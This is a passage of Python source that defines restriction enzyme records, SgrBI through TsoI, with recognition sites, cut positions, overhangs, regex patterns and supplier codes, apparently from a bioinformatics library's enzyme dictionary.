'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['SgrBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGTCGACG'),
'compsite': '(?=(?P<SgrDI>CGTCGACG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTCGACG',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SgrDI'] = _temp()
def _temp():
return {
'charac': (14, 14, None, None, 'CCDS'),
'compsite': '(?=(?P<SgrTI>CC[AGT][CG]))|(?=(?P<SgrTI_as>[CG][ACT]GG))',
'dna': None,
'freq': 42.666666666666664,
'fst3': 14,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCDS',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SgrTI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCGCC'),
'compsite': '(?=(?P<SgsI>GGCGCGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SgsI'] = _temp()
def _temp():
return {
'charac': (2, 0, None, None, 'GGGTC'),
'compsite': '(?=(?P<SimI>GGGTC))|(?=(?P<SimI_as>GACCC))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GTC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGTC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SimI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<SinI>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('X',),
}
rest_dict['SinI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTCGAG'),
'compsite': '(?=(?P<SlaI>CTCGAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'Y'),
}
rest_dict['SlaI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCCGGG'),
'compsite': '(?=(?P<SmaI>CCCGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['SmaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTTGAC'),
'compsite': '(?=(?P<SmaUMH5I>CTTGAC))|(?=(?P<SmaUMH5I_as>GTCAAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SmaUMH5I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGAACB'),
'compsite': '(?=(?P<SmaUMH8I>GCGAAC[CGT]))|(?=(?P<SmaUMH8I_as>[ACG]GTTCGC))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGAACB',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SmaUMH8I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ATTTAAAT'),
'compsite': '(?=(?P<SmiI>ATTTAAAT))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTTAAAT',
'size': 8,
'substrat': 'DNA',
'suppl': ('B', 'I', 'K', 'V'),
}
rest_dict['SmiI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CAYNNNNRTG'),
'compsite': '(?=(?P<SmiMI>CA[CT]....[AG]TG))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNRTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['SmiMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTYRAG'),
'compsite': '(?=(?P<SmlI>CT[CT][AG]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TYRA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTYRAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SmlI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTYRAG'),
'compsite': '(?=(?P<SmoI>CT[CT][AG]AG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TYRA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTYRAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SmoI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TACGTA'),
'compsite': '(?=(?P<SnaBI>TACGTA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGTA',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'K', 'M', 'N', 'R'),
}
rest_dict['SnaBI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTATAC'),
'compsite': '(?=(?P<SnaI>GTATAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTATAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SnaI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGCCGAG'),
'compsite': '(?=(?P<Sno506I>GGCCGAG))|(?=(?P<Sno506I_as>CTCGGCC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCCGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sno506I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACTAGT'),
'compsite': '(?=(?P<SpeI>ACTAGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTAGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['SpeI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCATGC'),
'compsite': '(?=(?P<SphI>GCATGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['SphI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGTACG'),
'compsite': '(?=(?P<SplI>CGTACG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTACG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SplI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TCGAG'),
'compsite': '(?=(?P<SpnRII>TCGAG))|(?=(?P<SpnRII_as>CTCGA))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGAG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SpnRII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCGGRAG'),
'compsite': '(?=(?P<SpoDI>GCGG[AG]AG))|(?=(?P<SpoDI_as>CT[CT]CCGC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGGRAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SpoDI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCCCGGGC'),
'compsite': '(?=(?P<SrfI>GCCCGGGC))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCCGGGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['SrfI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCCGGCG'),
'compsite': '(?=(?P<Sse232I>CGCCGGCG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCGGCG',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sse232I'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CCTGCAGG'),
'compsite': '(?=(?P<Sse8387I>CCTGCAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Sse8387I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGGWCCT'),
'compsite': '(?=(?P<Sse8647I>AGG[AT]CCT))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGWCCT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sse8647I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<Sse9I>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Sse9I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<SseBI>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['SseBI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<SsiI>CCGC))|(?=(?P<SsiI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGGC'),
'compsite': '(?=(?P<Ssp6803IV>GAAGGC))|(?=(?P<Ssp6803IV_as>GCCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ssp6803IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCAGCG'),
'compsite': '(?=(?P<Ssp714II>CGCAGCG))|(?=(?P<Ssp714II_as>CGCTGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCAGCG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ssp714II'] = _temp()
def _temp():
return {
'charac': (13, 8, None, None, 'GGTGA'),
'compsite': '(?=(?P<SspD5I>GGTGA))|(?=(?P<SspD5I_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 8,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SspD5I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGCGCC'),
'compsite': '(?=(?P<SspDI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SspDI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AATATT'),
'compsite': '(?=(?P<SspI>AATATT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATATT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['SspI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<SspMI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['SspMI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CGAAGAC'),
'compsite': '(?=(?P<SstE37I>CGAAGAC))|(?=(?P<SstE37I_as>GTCTTCG))',
'dna': None,
'freq': 16384.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGAAGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SstE37I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAGCTC'),
'compsite': '(?=(?P<SstI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'AGCT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['SstI'] = _temp()
def _temp():
return {
'charac': (8, 8, None, None, 'CCCG'),
'compsite': '(?=(?P<Sth132I>CCCG))|(?=(?P<Sth132I_as>CGGG))',
'dna': None,
'freq': 256.0,
'fst3': 8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth132I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGACGAC'),
'compsite': '(?=(?P<Sth20745III>GGACGAC))|(?=(?P<Sth20745III_as>GTCGTCC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGACGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth20745III'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCGG'),
'compsite': '(?=(?P<Sth302II>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sth302II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGT'),
'compsite': '(?=(?P<SthSt3II>GAAGT))|(?=(?P<SthSt3II_as>ACTTC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SthSt3II'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGATG'),
'compsite': '(?=(?P<StsI>GGATG))|(?=(?P<StsI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['StsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<StuI>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['StuI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCNGG'),
'compsite': '(?=(?P<StyD4I>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCNGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['StyD4I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<StyI>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'J', 'N'),
}
rest_dict['StyI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACRGAG'),
'compsite': '(?=(?P<SurP32aII>AC[AG]GAG))|(?=(?P<SurP32aII_as>CTC[CT]GT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SurP32aII'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ATTTAAAT'),
'compsite': '(?=(?P<SwaI>ATTTAAAT))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTTAAAT',
'size': 8,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'S'),
}
rest_dict['SwaI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'ACNGT'),
'compsite': '(?=(?P<TaaI>AC.GT))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACNGT',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TaaI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'ACGT'),
'compsite': '(?=(?P<TaiI>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'ACGT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TaiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCGA'),
'compsite': '(?=(?P<TaqI>TCGA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGA',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['TaqI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GACCGA'),
'compsite': '(?=(?P<TaqII>GACCGA))|(?=(?P<TaqII_as>TCGGTC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACCGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['TaqII'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'CACCCA'),
'compsite': '(?=(?P<TaqIII>CACCCA))|(?=(?P<TaqIII_as>TGGGTG))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TaqIII'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<TasI>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TasI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WGTACW'),
'compsite': '(?=(?P<TatI>[AT]GTAC[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WGTACW',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TatI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCSGC'),
'compsite': '(?=(?P<TauI>GC[CG]GC))',
'dna': None,
'freq': 512.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'CSG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCSGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TauI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAWTC'),
'compsite': '(?=(?P<TfiI>GA[AT]TC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'AWT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAWTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TfiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCAAG'),
'compsite': '(?=(?P<TpyTP2I>ACCAAG))|(?=(?P<TpyTP2I_as>CTTGGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TpyTP2I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<Tru1I>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Tru1I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<Tru9I>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'M', 'R', 'V'),
}
rest_dict['Tru9I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CASTG'),
'compsite': '(?=(?P<TscAI>CA[CG]TG))',
'dna': None,
'freq': 512.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 10,
'ovhgseq': 'NNCASTGNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CASTG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['TscAI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTSAC'),
'compsite': '(?=(?P<TseFI>GT[CG]AC))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTSAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTSAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['TseFI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCWGC'),
'compsite': '(?=(?P<TseI>GC[AT]GC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'CWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCWGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['TseI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'TARCCA'),
'compsite': '(?=(?P<TsoI>TA[AG]CCA))|(?=(?P<TsoI_as>TGG[CT]TA))',
'dna': None,
'freq': 2048.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TARCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['TsoI'] = _temp()
def _temp():
